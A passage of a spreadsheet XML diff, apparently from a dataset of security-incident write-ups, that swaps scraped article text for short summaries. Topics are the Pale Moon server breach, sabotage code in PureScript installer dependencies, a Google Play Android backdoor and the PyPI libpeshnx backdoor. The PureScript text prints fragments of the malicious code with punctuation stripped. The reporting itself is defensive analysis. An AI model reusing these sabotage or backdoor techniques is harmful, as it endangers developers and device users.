'access', 'system', 'physical', 'access', 'access', 'different', 'node', 'insufficient', 'separation', 'access', 'different', 'local', 'subnet', 'remote', 'desktop', 'session', 'insufficient', 'separation', 'access', 'file', 'system', 'administrative', 'access', 'credential', 'network', 'insufficient', 'vmnet', 'port', 'remote', 'access', 'control', 'panel', 'insecure', 'control', 'panel', 'provider', 'issue', 'window', 'server', 'image', 'preactivatedvolume', 'provider', 'remote', 'access', 'remote', 'access', 'execution', 'insecure', 'software', 'potential', 'breach', 'point', 'access', 'time', 'limited', 'secure', 'unique', 'password', 'protection', 'remote', 'solid', 'archived', 'executable', 'portable', 'ex', 'pale', 'version', 'server', 'time', 'file', 'archive', 'server', 'main', 'distribution', 'channel', 'pale', 'moon', 'version', 'next', 'release', 'cycle', 'time', 'current', 'version', 'matter', 'note', 'file', 'server', 'level', 'file', 'archive', 'extractable', 'installersportable', 'version', 'file', 'archive', 'incident', 'server', 'inoperable', 'file', 'system', 'backup', 'state', 'passage', 'time', 'breach', 'undetected', 'infected', 'binary', 'cento', 'solution', 'file', 'clean', 'clear', 'least', 'step', 'version', 'pale', 'moon', 'file', 'signature', 'file', 'period', 'unavailability', 'reasonable', 'cost', 'open', 'source', 'development', 'binary', 'digital', 'signature', 'binary', 'original', 'late', 'version', 'executable', 'file', 'hashestxt', 'integrity', 'complete', 'list', 'hash', 'clean', 'file', 'major', 'vendor', 'preferred', 'mainstream', 'antivirus', 'scanner', 'verify', 'installer', 'clean', 'installer', 'portable', 'selfextractor', 'full', 'scan', 'clean', 'system', 'reputable', 'software', 'future', 'likely', 'breach', 'point', 'providercentric', 'trust', 'provider', 'sufficient', 'convenience', 'storage', 'server', 'cento', 'setup', 'local', 'access', 'control', 'panel', 'access', 'weak', 'point', 'setup', 'alternative', 'storage', 'potential', 'solution', 'option', 'archive', 'pastversion', 'binary', 'symbol', 'source', 'snapshot', 'suggestion', 'high', 'level', 'trust', 'nasty', 'situation', 'private', 'message', 'integrity', 'verifiable', 'archive', 'server', 'limited', 'capacity', 'next', 'couple', 'day', 'good', 'person', 'wisdom', 'knowledge', 'knowledge', 'wisdom', 'future', 'difficult', 'print', 'view', 'post', 'page', 'return', 'forum', 'website', 'jump', 'announcement', 'moon', 'question', 'support', 'compatibility', 'localization', 'language', 'pack', 'service', 'party', 'otherfuture', 'project', 'platform', 'addon', 'extension', 'releasessupport', 'theme', 'board', 'general', 'discussion', 'forum', 'website', 'foreign', 'language', 'board', 'german', 'language', 'newsannouncement', 'support', 'area', 'window', 'general', 'discussion', 'pale', 'moon', 'addon', 'website', 'binary', 'outcast', 'project', 'index', 'time', 'delete', 'cookie', 'forum', 'software']</t>
         </is>
       </c>
     </row>
@@ -3384,17 +2947,12 @@
       </c>
       <c r="C114" t="inlineStr">
         <is>
-          <t>harry garrood software engineer based edinburgh scotland interests include helping people program computers effectively open source maths music hold email harrygarroodme mastodon hdgarrood​hachydermio twitter hdgarrood github hdgarrood blog projects talks malicious code purescript installer earlier week found addressed malicious code purescript installer malicious code inserted dependencies installer specifically packages maintained shinnn original author purescript installer also maintainer around month there’s important background context explain first many disagreements unpleasant conversations shinnn maintenance purescript installer compiler maintainers recently decided would better maintained asked would transfer purescript package begrudgingly purescript compiler release last week first release compiler since took purescript package quick summary malicious code added various dependencies purescript installer shinnn claims malicious code published attacker gained access account aware purpose malicious code sabotage purescript installer prevent running successfully latest version purescript installer malicious code removed dependencies shinnn dropped want absolutely sure malicious code machine delete nodemodules directories packagelockjson files lower bound purescript package ongoing discussion support order ascertain else mitigate issue update responded maintainer ratemap loadfromcwdornpm replied informed published packages feared account compromised removed ratemap103 loadfromcwdornpm302 registry maintainer also published installpurescriptcli051 whose dependencies pinned loadfromcwdornpm301 ratemap102 done prevent purescript v012x installing malicious versions loadfromcwdornpm ratemap malicious code come code inserted first package loadfromcwdornpm version later package ratemap starting version number versions packages published last days many unpublished tell remaining version loadfromcwdornpm including malicious code remaining version ratemap including malicious code version update removed loadfromcwdornpm302 ratemap103 registry short code sabotages purescript installer prevent download completing making installer hang “check prebuilt binary provided platform” step first exploit breaking loadfromcwdornpm package call loadfromcwdornpm would return passthrough stream instead package expecting case request package using downloading compiler binaries second iteration exploit modifying source file prevent download callback firing i’ve gone detail bottom post timeline current understanding happened july around purescript released including version package purescript point multiple compiler maintainers able successfully install compiler using installer july around loadfromcwdornpm302 published exploit breaking purescript installer aware first published version shinnn packages includes malicious code person trying install purescript malicious code soon start receiving reports purescriptnpminstaller12 recommend people alternative installation method figure what’s going compiler maintainers investigate stumped it’s difficult reliably reproduce failure doesn’t occur local checkout purescript installer july around doolse identifies loadfromcwdornpm302 cause purescriptnpminstaller12 comment doolse opens issue loadfromcwdornpm repo pointing package breaking purescript installer although stage none spot code malicious issue later deleted shinnn july around loadfromcwdornpm304 published longer includes exploit july around ratemap103 published includes advanced version exploit extra code removes trace july around still suspecting faith thinking loadfromcwdornpm issue genuine publish version purescript installer vendors modified version dltar loadfromcwdornpm fixes issue people presumably older ratemap pinned packagelockjson files however others still able reproduce problem version exploit included ratemap july around spot malicious code ratemap report support understanding deliberate faith start working either vendoring dropping dependencies purescript installer shinnn maintains july around publish version purescript installer every dependency shinnn either dropped vendored course vendored also audited addressed purescriptinstaller package dropped dependencies maintained shinnn v025 also marked earlier versions purescriptinstaller deprecated install purescript package version still pulling packages maintained shinnn suggest updating soon possible still using 012x installing means currently discussion npm’s team discuss best resolve issue previous versions purescript package exploits work i’ve archived complete copies packages i’ve identified including malicious code gist exploit version loadfromcwdornpm first version exploit loadfromcwdornpm302 occurs lines indexjs const tasks passthrough arglen typeof args function throw typeerror expected function compare package versions inspectwithkind args else tasks unshift resolvesemverfromnpm tasks unshift resolvefromnpm modulepkgid const results await promise tasks parent module parent parent parent const path parent path endswith path dirname path existssync resolve parent break catch parent typeof parent string return results code little obfuscated didn’t take long work tasks array initially contains passthrough stream constructor code calls tasksunshift twice passthrough constructor index tasks array important later first loop works require chain find code recursively inspecting parent property module chain condition path endswith path dirname path existssync resolve purpose condition appears decide whether activate malicious code tell pathendswithcli condition designed evaluate true older versions purescript installer took purescript package depended installpurescriptcli package maintained shinnn recent version purescript dependency replaced purescriptinstaller package maintain purpose condition seems ensure malicious code runs installer used shinnn second condition checking whether directory alongside file purpose presumably avoid activating malicious code installer working directory make harder reproduce track purpose parent variable stage indicate whether malicious code exploit parent undefined shouldn’t string statement typeof parent string return results returns passthrough constructor case malicious code note references results2 source file effect loadfromcwdornpmrequest passthrough constructor code along lines const request loadfromcwdornpm request request httpsgithubcomarchivetargz pipe nothing happens http request performed exploit version ratemap ratemap103 includes loop control whether exploit runs although also includes interesting modifications parent module const existssync existssync readfilesync readfilesync writefilesync writefilesync require parent parent parent const path path parent path endswith path dirname path existssync resolve parent break catch parent typeof parent string const require resolve buffer tostring writefilesync filename readfilesync filename utf8 replace parent module exportsu moduleexports catch writefilesync readfilesync utf8 replace null chunk catch loop case exploit code going first resolves path dltar package local filesystem note bufferfrom obscure buffer tostring dltar file path indexjs dltar package stored variable writefilesync filename readfilesync filename utf8 replace parent module exportsu moduleexports catch rewrites current file remove malicious code presumably also order make exploit harder track finally writefilesync readfilesync utf8 replace null chunk catch replaces lines dltar indexjs file match regular expression nscbnull chunk empty strings running code dltar080 latest version time writing produces following diff ahomeharrycodepurescriptnpminstallerdltarindexjs bnodemodulespurescriptinstallerdltarindexjs moduleexports function dltarargs transform transformchunk encoding unpackstreamresponsebytes chunklength cbnull chunk unpackstream removes call means subscribers dltar won’t fire dont host comments blog thoughts questions know twitter hdgarrood</t>
+          <t>Former PureScript installer maintainer inserted malicious code into PureScript npm installer dependencies after being removed as a maintainer of the PureScript installer project.</t>
         </is>
       </c>
       <c r="D114" t="inlineStr">
         <is>
           <t>https://harry.garrood.me/blog/malicious-code-in-purescript-npm-installer/</t>
-        </is>
-      </c>
-      <c r="E114" t="inlineStr">
-        <is>
-          <t>['interest', 'people', 'computer', 'source', 'math', 'music', 'email', 'project', 'malicious', 'code', 'purescript', 'installer', 'week', 'malicious', 'code', 'purescript', 'malicious', 'code', 'dependency', 'package', 'shinnn', 'original', 'author', 'month', 'important', 'background', 'context', 'many', 'disagreement', 'unpleasant', 'conversation', 'shinnn', 'maintenance', 'installer', 'compiler', 'purescript', 'package', 'purescript', 'compiler', 'release', 'last', 'week', 'release', 'compiler', 'purescript', 'package', 'quick', 'summary', 'malicious', 'code', 'various', 'dependency', 'shinnn', 'claim', 'malicious', 'code', 'attacker', 'access', 'account', 'aware', 'purpose', 'malicious', 'code', 'sabotage', 'purescript', 'installer', 'prevent', 'late', 'version', 'purescript', 'installer', 'malicious', 'code', 'dependency', 'sure', 'malicious', 'code', 'machine', 'delete', 'nodemodule', 'directory', 'packagelockjson', 'file', 'purescript', 'package', 'ongoing', 'discussion', 'support', 'order', 'mitigate', 'issue', 'update', 'maintainer', 'informed', 'package', 'account', 'loadfromcwdornpm302', 'registry', 'maintainer', 'dependency', 'ratemap102', 'purescript', 'malicious', 'version', 'malicious', 'code', 'code', 'first', 'package', 'package', 'ratemap', 'version', 'number', 'version', 'package', 'last', 'day', 'many', 'unpublished', 'version', 'code', 'version', 'ratemap', 'malicious', 'code', 'version', 'update', 'registry', 'short', 'code', 'purescript', 'installer', 'prevent', 'download', 'installer', 'hang', 'prebuilt', 'binary', 'platform', 'step', 'call', 'stream', 'package', 'case', 'request', 'package', 'binary', 'second', 'iteration', 'source', 'file', 'prevent', 'download', 'callback', 'detail', 'bottom', 'post', 'timeline', 'current', 'understanding', 'version', 'package', 'purescript', 'point', 'multiple', 'compiler', 'able', 'compiler', 'installer', 'purescript', 'installer', 'aware', 'version', 'shinnn', 'package', 'malicious', 'code', 'person', 'purescript', 'malicious', 'code', 'report', 'purescriptnpminstaller12', 'people', 'alternative', 'installation', 'method', 'figure', 'compiler', 'difficult', 'failure', 'local', 'checkout', 'purescript', 'installer', 'doolse', 'cause', 'purescriptnpminstaller12', 'comment', 'doolse', 'package', 'purescript', 'installer', 'stage', 'none', 'spot', 'code', 'malicious', 'issue', 'shinnn', 'loadfromcwdornpm304', 'ratemap103', 'advanced', 'version', 'extra', 'code', 'trace', 'faith', 'genuine', 'publish', 'version', 'purescript', 'installer', 'vendor', 'version', 'fix', 'people', 'old', 'ratemap', 'packagelockjson', 'file', 'other', 'able', 'problem', 'version', 'exploit', 'ratemap', 'spot', 'malicious', 'code', 'ratemap', 'report', 'support', 'deliberate', 'faith', 'dropping', 'dependency', 'shinnn', 'maintain', 'version', 'dependency', 'shinnn', 'vendored', 'course', 'purescriptinstaller', 'package', 'dependency', 'shinnn', 'early', 'version', 'purescript', 'package', 'version', 'package', 'shinnn', 'possible', '012x', 'discussion', 'team', 'good', 'resolve', 'issue', 'previous', 'version', 'purescript', 'package', 'work', 'complete', 'copy', 'package', 'malicious', 'code', 'gist', 'first', 'line', 'const', 'task', 'function', 'typeerror', 'function', 'package', 'version', 'inspectwithkind', 'arg', 'else', 'unshift', 'resolvesemverfromnpm', 'task', 'unshift', 'modulepkgid', 'const', 'result', 'promise', 'task', 'parent', 'module', 'parent', 'parent', 'parent', 'const', 'parent', 'path', 'parent', 'break', 'catch', 'parent', 'typeof', 'parent', 'string', 'return', 'result', 'code', 'little', 'long', 'work', 'task', 'array', 'stream', 'constructor', 'code', 'tasksunshift', 'constructor', 'index', 'task', 'array', 'important', 'first', 'loop', 'work', 'chain', 'code', 'parent', 'property', 'module', 'chain', 'condition', 'resolve', 'purpose', 'condition', 'malicious', 'code', 'tell', 'pathendswithcli', 'condition', 'true', 'old', 'version', 'purescript', 'installer', 'purescript', 'package', 'installpurescriptcli', 'package', 'shinnn', 'recent', 'version', 'dependency', 'purescriptinstaller', 'package', 'purpose', 'condition', 'malicious', 'code', 'run', 'shinnn', 'second', 'condition', 'directory', 'file', 'purpose', 'malicious', 'code', 'installer', 'directory', 'hard', 'track', 'purpose', 'parent', 'variable', 'stage', 'malicious', 'code', 'parent', 'undefined', 'statement', 'typeof', 'parent', 'string', 'return', 'result', 'constructor', 'case', 'malicious', 'code', 'note', 'reference', 'results2', 'source', 'file', 'effect', 'constructor', 'code', 'line', 'request', 'http', 'request', 'exploit', 'version', 'ratemap', 'ratemap103', 'loop', 'control', 'run', 'interesting', 'modification', 'parent', 'module', 'parent', 'parent', 'parent', 'const', 'path', 'path', 'parent', 'parent', 'break', 'catch', 'parent', 'typeof', 'parent', 'string', 'const', 'resolve', 'buffer', 'parent', 'module', 'moduleexport', 'chunk', 'catch', 'loop', 'case', 'code', 'path', 'dltar', 'package', 'local', 'filesystem', 'note', 'obscure', 'buffer', 'dltar', 'file', 'path', 'package', 'variable', 'parent', 'module', 'moduleexport', 'current', 'file', 'malicious', 'code', 'hard', 'track', 'chunk', 'catch', 'line', 'dltar', 'indexjs', 'file', 'regular', 'expression', 'nscbnull', 'chunk', 'empty', 'string', 'code', 'late', 'version', 'time', 'writing', 'moduleexport', 'dltararg', 'transformchunk', 'encoding', 'unpackstreamresponsebyte', 'cbnull', 'chunk', 'unpackstream', 'call', 'subscriber', 'comment', 'blog', 'thought', 'question']</t>
         </is>
       </c>
     </row>
@@ -3411,17 +2969,12 @@
       </c>
       <c r="C115" t="inlineStr">
         <is>
-          <t>javascript support required site fully operational browser browser obsolete page load correctly customers activate drweb license technical support documentation download drweb close partners online purchase library library library search search search contact tech support rules regarding submitting send message query form call forum tickets total active latest ticket call profile close home business estore download support partners information antivirus doctor news subscribe news digests news digests news comments news topic drweb products updates drweb avdesk promos training news community news corporate news virus alerts monthly reviews realtime news bait viruses mobile threats antivirus times issue issues categories news boxes news boxes site feeds press center press contact info press gallery back news list doctor dangerous android backdoor distributed google play july doctor identified backdoor trojan google play executes cybercriminal commands allowing criminals remotely control infected android devices users malware dubbed androidbackdoor736origin distributed guise opengl plugin application supposed check existing version opengl interface download updates launched androidbackdoor736origin requests several important system permissions allow collect confidential information work file system also tries permission overlay windows interfaces programs window contains button “check” updates opengl interface user taps window trojan simulates search versions opengl actually perform checks victim closes application window androidbackdoor736origin removes icon list main screen creates shortcut instead makes harder user remove trojan since deleting shortcut effect malware androidbackdoor736origin continuously active background launched icon shortcut also automatically startup cybercriminals’ command firebase cloud messaging trojan’s basic malicious functionality contained encrypted auxiliary file stored directory containing program resources decrypted loaded memory upon launch androidbackdoor736origin backdoor communicates several command control servers receive commands attackers send collected data cybercriminals also control trojan firebase cloud messaging service androidbackdoor736origin capable sending information contacts contact list server sending information text messages server investigated version trojan permissions sending phone call history server sending device location server downloading launching file using dexclassloader class sending information installed software server downloading launching specified executable file downloading file server uploading specified file server transmitting information files specified directory memory card server executing shell command launching activity specified command downloading installing android application displaying notification specified command requesting permission specified command sending list permissions granted trojan server letting device sleep mode specified time period trojan encrypts data transmitted server request protected unique generated based current time encrypts server response androidbackdoor736origin install applications using several methods automatically system root access using shell command using system package manager system software displaying standard system installation dialog user needs confirm installation backdoor serious spyware also used phishing display windows notifications content also download install malicious application well execute arbitrary code example command attackers androidbackdoor736origin download launch exploit obtain root privileges longer need users permission install programs doctor notified google trojan already removed google play time publication androidbackdoor736origin components successfully detected removed drweb android pose users read androidbackdoor736origin android backdoor googleplay spyware android needs protection drweb first russian antivirus android million downloads—just google play available free charge users drweb home products free download rate vote account create account dont repost like benefit account tell think doctor web’s site administration news item enter admin beginning comment question author comments names comments home business support customers partners doctor contact info doctor doctor cybersecurity company focused detection prevention response technologies privacy policy download drweb android free threemonth trial protection features available renew trial license appgalleryon google continuing website consenting doctor web’s cookies technologies related collection visitor statistics learn</t>
+          <t>An app called OpenGL Plugin contains malware that executes commands, allowing the criminals to remotely control the infected Android devices and spy on users.</t>
         </is>
       </c>
       <c r="D115" t="inlineStr">
         <is>
           <t>https://news.drweb.com/show/?c=0&amp;p=0&amp;lng=en&amp;i=13349</t>
-        </is>
-      </c>
-      <c r="E115" t="inlineStr">
-        <is>
-          <t>['site', 'operational', 'page', 'load', 'customer', 'license', 'technical', 'support', 'documentation', 'download', 'close', 'partner', 'online', 'purchase', 'search', 'search', 'search', 'contact', 'tech', 'support', 'rule', 'message', 'query', 'form', 'call', 'forum', 'ticket', 'active', 'late', 'ticket', 'call', 'profile', 'close', 'home', 'business', 'estore', 'partner', 'information', 'doctor', 'news', 'digest', 'news', 'digest', 'news', 'comment', 'news', 'topic', 'update', 'training', 'news', 'news', 'corporate', 'news', 'virus', 'monthly', 'review', 'realtime', 'news', 'bait', 'mobile', 'threat', 'issue', 'issue', 'category', 'news', 'box', 'news', 'box', 'site', 'press', 'center', 'press', 'contact', 'info', 'press', 'gallery', 'back', 'news', 'list', 'doctor', 'dangerous', 'android', 'backdoor', 'play', 'doctor', 'backdoor', 'play', 'cybercriminal', 'command', 'criminal', 'device', 'user', 'malware', 'guise', 'opengl', 'plugin', 'application', 'version', 'opengl', 'interface', 'download', 'update', 'request', 'several', 'important', 'system', 'permission', 'confidential', 'information', 'work', 'file', 'system', 'permission', 'overlay', 'window', 'interface', 'program', 'window', 'button', 'check', 'opengl', 'interface', 'user', 'search', 'version', 'opengl', 'check', 'victim', 'application', 'window', 'icon', 'list', 'main', 'screen', 'shortcut', 'hard', 'user', 'trojan', 'shortcut', 'effect', 'malware', 'active', 'background', 'icon', 'shortcut', 'cybercriminal', 'command', 'firebase', 'cloud', 'basic', 'malicious', 'functionality', 'auxiliary', 'file', 'directory', 'program', 'resource', 'memory', 'launch', 'backdoor', 'several', 'command', 'control', 'server', 'command', 'attacker', 'collected', 'data', 'cybercriminal', 'service', 'capable', 'information', 'contact', 'contact', 'list', 'server', 'information', 'text', 'message', 'server', 'version', 'trojan', 'permission', 'phone', 'call', 'history', 'server', 'device', 'location', 'server', 'file', 'dexclassloader', 'class', 'information', 'software', 'server', 'executable', 'file', 'file', 'server', 'file', 'server', 'information', 'file', 'directory', 'memory', 'card', 'server', 'executing', 'shell', 'command', 'activity', 'command', 'android', 'application', 'notification', 'command', 'permission', 'command', 'list', 'permission', 'server', 'device', 'sleep', 'mode', 'time', 'period', 'datum', 'server', 'request', 'unique', 'current', 'time', 'server', 'response', 'install', 'application', 'several', 'method', 'system', 'root', 'access', 'shell', 'command', 'system', 'package', 'manager', 'system', 'software', 'standard', 'system', 'installation', 'dialog', 'user', 'installation', 'backdoor', 'serious', 'spyware', 'phishing', 'display', 'window', 'notification', 'content', 'malicious', 'application', 'arbitrary', 'code', 'example', 'command', 'attacker', 'root', 'privilege', 'user', 'permission', 'program', 'doctor', 'play', 'time', 'publication', 'component', 'user', 'first', 'russian', 'download', 'play', 'available', 'free', 'charge', 'user', 'home', 'product', 'free', 'download', 'rate', 'vote', 'account', 'account', 'benefit', 'account', 'tell', 'doctor', 'web', 'site', 'administration', 'news', 'item', 'admin', 'comment', 'question', 'author', 'name', 'comment', 'home', 'business', 'support', 'customer', 'partner', 'doctor', 'contact', 'info', 'doctor', 'doctor', 'cybersecurity', 'company', 'detection', 'prevention', 'response', 'technology', 'policy', 'free', 'trial', 'protection', 'available', 'trial', 'license', 'website', 'doctor', 'web', 'cookie', 'collection', 'visitor', 'statistic']</t>
         </is>
       </c>
     </row>
@@ -3438,17 +2991,12 @@
       </c>
       <c r="C116" t="inlineStr">
         <is>
-          <t>buyer’s guide software supply chain download sboms moment hear make actionable save spot gartner® report mitigate enterprise software supply chain risks insights solutions software supply chain spectra assure procurement spectra assure build release automate support triage incident response siemsoar protect cloud file shares optimize hunting ransomware feed malware hunting sandbox email intelligence platform intelligence platform microsoft sentinel product technology product technology titanium platform spectra assure software supply chain reversinglabs intelligence reversinglabs elastic infrastructure reversinglabs analysis hunting free open source yara rules integrations partners partners become partner value added partners marketplaces alliances reversinglabs synopsys resources resources blog content library webinars software deconstruction demo series reversingglass concepts explained conversinglabs podcast labs yara rules demo videos learning reversinglabs company company leadership careers series investment company news events events press press releases news demo contact support login blog developer portal search reversinglabs blog research july suppy chain malware detecting malware package manager repositories malicious actors constantly lookout attack vectors techniques using infiltrate even secure organizations many organizations adopted best practices defenseindepth diversity defense continue improve posture impede attackers attacking organization headon likely yield fewer results typically detected earlier taking covert approach using spear phishing target individuals major covert attack vector software supply chain attacker doesn’t target organization instead supply chain attacks target trusted vendor multiple vendors provide organization software services additionally software delivery continues evolve providers often referred package manager repositories emerged serve software development companies popular package manager repositories software developers pypi rubygems nuget name repositories serve thousands millions software developers around world developers able accelerate projects openly sourcing software components meet needs it’s cumbersome potentially insecure reinvent wheel whenever developer needs implement common functionality already implemented someone else library module proven work correctly need make http request python requests pypi package would like manage rabbitmq ruby rabbitmqmanager ruby python package index commonly known pypi “cheese shop” target misuse several occasions common attack approach named typosquatting attacker deliberately makes typos naming malicious packages djanga instead django hope unsuspecting user accidentally mistype name install malicious package pypi removed affected packages theres still question ones satisfy curiosity processed entire pypi repository titanium platform static analysis solution running single server epyc core processors nvme disks data contained files including packages historical versions total size packages processed little less specifically hours minutes titanium platform managed unpack million files input data million unique better glimpse unpacked files filetype distribution snapshot taken seen figure binary column consists archive formats gzip since majority files repository targz archives text column mostly covers python scripts various setup configuration files however packages contain executable files various operating systems macho files example package used compare files differences testing sample includes variety executable nonexecutable file formats issue users pull package repository might bargained figure filetype distribution processing effort included additional custom yara rules modelled malicious data exposed researchers able find package initial analysis missed still available pypi repository time writing affected package name libpeshnx developed user ruri12 released november illustrated screenshot name libpeshnx looks like variant another previously reported package author called libpeshka additional packages identified called libpesh libari contain references malicious function without code figure available packages backdoor logic extremely simple succinctly described libpeshka first found nutshell package installed linux system download file domain save hidden file named user’s home directory persist inside bashrc background process whenever interactive nonlogin shell created time shell opened initial login complete source code seen figure figure backdoor downloader code luckily package looks like development version malware package installed doesn’t automatically malicious function install function library also creates eggsecutable script used execute malicious payload outofthebox alternatively malicious library imported precise module function names known executed additionally server seems offline quite time already offline months initial libpeshka disclosure nonetheless troubling installations libpeshnx monthly average exact installation breakdown month seen figure ruri12’s packages installed even frequently pypi’s team contacted packages removed repository we’d like thank prompt response figure monthly number libpeshnx installations given lack scrutiny involved package submission review approval process attack surface size platforms provide public package repositories might slowly become malware repository platform unless posture changes greatly reduce possibility hosting malware repositories would benefit continuous processing better review process careful type you’re attacker’s type affected packages sha256 libari01 1f45d5e3948533c2c7f389968e006a7e33b6b79348d4375f3de60ea47a75d2cc libari02 669f4ab40636f59470496ae0da9d852294b2d5918a7242d0bd8f5ba489abae5b libari03 5639a4c6aa9ec39f37644a543f9b5a04e7fa5aa63843602c94db91034461d8f1 libpesh01 0eaa213c631966e2f08d858c9b4766ecc5a6f49dd2a75f91c74781f447af6b4e libpeshnx01 b828582a6dd07ba10ff71ecbb4300866f690e46efb23a969ffd29c8990f7880e disclosure timeline contacted pypi team packages removed promptly speed trends understand landscape state software supply chain plus learn reversinglabs spectra assure software supply chain keep learning update understanding buyers guide software supply chain join webinar need upgrade appsec report take action state supply chain join discussion state software supply chain webinar gartners guidance managing software supply chain risk tags research research blog posts appsec supply chain march software supply chain numbers stats matter understand state software supply chain takeaways recent research surveys application development pros read research march suspicious nuget package grabs data industrial systems espionage long driver malicious cyber campaigns heres research team knows suspicious sqzrframework480 campaign read devsecops march memorysafe languages design insights lessons learned memory safety stubborn dangerous software weaknesses insights takeaways google report issue read topics blog posts appsec supply chain devsecops research operations products technology company events follow youtube linkedin subscribe best blog delivered inbox weekly stay date trends analysis best practices across intelligence software supply chain special reports state software supply chain january latest blog posts securing medical devices sboms conversations hunting software supply chain reproducible builds graduate software supply chain glassboard conversations reversinglabs field ciso matt rose software package deconstruction video conferencing software analyzing risks software supply chain software supply chain hotline need immediate assistance software supply chain issue contact sscs incident response blog webinars demo videos events news glossary careers contact privacy policy cookies rights reserved reversinglabs</t>
+          <t>libpeshnx was a backdoored package with a C2 channel built in. Reversing Labs scanned all of PyPI with a static analysis tool (their own Titanium Platform) and found this malicious package, plus 4 others.</t>
         </is>
       </c>
       <c r="D116" t="inlineStr">
         <is>
           <t>https://blog.reversinglabs.com/blog/suppy-chain-malware-detecting-malware-in-package-manager-repositories</t>
-        </is>
-      </c>
-      <c r="E116" t="inlineStr">
-        <is>
-          <t>['buyer', 'guide', 'software', 'supply', 'chain', 'download', 'moment', 'actionable', 'spot', 'report', 'enterprise', 'software', 'supply', 'chain', 'risk', 'insight', 'solution', 'software', 'supply', 'chain', 'procurement', 'spectra', 'build', 'release', 'automate', 'support', 'triage', 'incident', 'response', 'protect', 'cloud', 'file', 'share', 'ransomware', 'feed', 'sandbox', 'email', 'intelligence', 'platform', 'intelligence', 'platform', 'product', 'technology', 'product', 'technology', 'titanium', 'platform', 'assure', 'software', 'supply', 'chain', 'elastic', 'infrastructure', 'analysis', 'free', 'open', 'source', 'yara', 'rule', 'partner', 'partner', 'partner', 'value', 'partner', 'marketplace', 'alliance', 'resource', 'resource', 'blog', 'content', 'library', 'software', 'deconstruction', 'demo', 'series', 'reversingglass', 'concept', 'rule', 'video', 'company', 'company', 'leadership', 'career', 'series', 'investment', 'company', 'news', 'event', 'event', 'press', 'release', 'news', 'demo', 'contact', 'support', 'login', 'blog', 'developer', 'portal', 'search', 'reversinglab', 'blog', 'research', 'chain', 'malware', 'package', 'manager', 'malicious', 'actor', 'attack', 'vector', 'technique', 'secure', 'organization', 'many', 'organization', 'good', 'practice', 'defenseindepth', 'diversity', 'defense', 'posture', 'impede', 'attacker', 'organization', 'headon', 'few', 'result', 'covert', 'approach', 'spear', 'phishing', 'target', 'individual', 'major', 'covert', 'attack', 'vector', 'software', 'supply', 'chain', 'attacker', 'organization', 'chain', 'attack', 'target', 'vendor', 'multiple', 'vendor', 'organization', 'software', 'service', 'software', 'delivery', 'provider', 'package', 'manager', 'repository', 'software', 'development', 'company', 'popular', 'package', 'manager', 'repository', 'software', 'developer', 'name', 'repository', 'thousand', 'software', 'developer', 'world', 'developer', 'able', 'project', 'software', 'component', 'cumbersome', 'insecure', 'reinvent', 'wheel', 'developer', 'common', 'functionality', 'library', 'module', 'work', 'http', 'request', 'rabbitmqmanager', 'package', 'index', 'pypi', 'cheese', 'shop', 'target', 'misuse', 'several', 'occasion', 'common', 'attack', 'approach', 'attacker', 'typo', 'malicious', 'package', 'djanga', 'unsuspecting', 'user', 'mistype', 'name', 'malicious', 'package', 'pypi', 'package', 'question', 'one', 'curiosity', 'entire', 'titanium', 'platform', 'static', 'analysis', 'solution', 'single', 'server', 'processor', 'datum', 'file', 'package', 'historical', 'version', 'total', 'size', 'package', 'hour', 'minute', 'titanium', 'platform', 'unpack', 'file', 'input', 'datum', 'unique', 'well', 'glimpse', 'unpacked', 'file', 'filetype', 'distribution', 'snapshot', 'figure', 'binary', 'column', 'archive', 'format', 'majority', 'file', 'repository', 'targz', 'archive', 'text', 'column', 'python', 'script', 'various', 'setup', 'configuration', 'file', 'package', 'executable', 'file', 'various', 'operating', 'system', 'macho', 'file', 'example', 'package', 'file', 'difference', 'sample', 'variety', 'executable', 'nonexecutable', 'file', 'format', 'user', 'package', 'repository', 'figure', 'filetype', 'distribution', 'processing', 'effort', 'additional', 'custom', 'yara', 'rule', 'malicious', 'datum', 'researcher', 'able', 'package', 'initial', 'analysis', 'available', 'time', 'package', 'name', 'libpeshnx', 'user', 'ruri12', 'illustrated', 'screenshot', 'name', 'libpeshnx', 'variant', 'package', 'author', 'additional', 'package', 'reference', 'malicious', 'function', 'code', 'figure', 'available', 'package', 'backdoor', 'logic', 'simple', 'nutshell', 'package', 'download', 'file', 'domain', 'hidden', 'file', 'user', 'home', 'directory', 'persist', 'background', 'process', 'interactive', 'shell', 'time', 'shell', 'initial', 'login', 'complete', 'source', 'code', 'figure', 'figure', 'backdoor', 'downloader', 'code', 'package', 'development', 'version', 'malicious', 'function', 'install', 'function', 'library', 'eggsecutable', 'script', 'malicious', 'payload', 'malicious', 'library', 'precise', 'module', 'function', 'name', 'server', 'offline', 'time', 'offline', 'month', 'initial', 'disclosure', 'troubling', 'installation', 'monthly', 'average', 'exact', 'installation', 'breakdown', 'month', 'figure', 'ruri12', 'package', 'team', 'package', 'repository', 'prompt', 'response', 'figure', 'monthly', 'number', 'libpeshnx', 'installation', 'lack', 'scrutiny', 'package', 'submission', 'review', 'approval', 'process', 'attack', 'surface', 'size', 'platform', 'public', 'package', 'repository', 'repository', 'platform', 'posture', 'change', 'possibility', 'malware', 'repository', 'continuous', 'processing', 'well', 'review', 'process', 'careful', 'type', 'attacker', 'type', 'package', 'libari03', 'team', 'package', 'speed', 'trend', 'landscape', 'state', 'software', 'supply', 'chain', 'spectra', 'assure', 'software', 'supply', 'chain', 'update', 'understanding', 'buyer', 'software', 'supply', 'chain', 'webinar', 'upgrade', 'report', 'action', 'state', 'supply', 'chain', 'discussion', 'state', 'software', 'supply', 'chain', 'webinar', 'gartner', 'guidance', 'software', 'supply', 'chain', 'risk', 'tag', 'research', 'research', 'blog', 'post', 'supply', 'chain', 'software', 'supply', 'chain', 'number', 'stat', 'state', 'software', 'supply', 'chain', 'recent', 'research', 'survey', 'application', 'development', 'pro', 'research', 'suspicious', 'nuget', 'package', 'data', 'industrial', 'system', 'long', 'driver', 'malicious', 'cyber', 'campaign', 'research', 'team', 'suspicious', 'sqzrframework480', 'campaign', 'devsecop', 'language', 'insight', 'lesson', 'memory', 'safety', 'stubborn', 'dangerous', 'software', 'weakness', 'insight', 'takeaway', 'issue', 'topic', 'blog', 'post', 'supply', 'chain', 'research', 'operation', 'product', 'technology', 'company', 'event', 'linkedin', 'subscribe', 'good', 'blog', 'inbox', 'weekly', 'date', 'trend', 'analysis', 'good', 'practice', 'intelligence', 'software', 'supply', 'chain', 'special', 'report', 'state', 'software', 'supply', 'chain', 'late', 'blog', 'post', 'medical', 'device', 'conversation', 'software', 'supply', 'chain', 'graduate', 'software', 'supply', 'chain', 'glassboard', 'conversation', 'field', 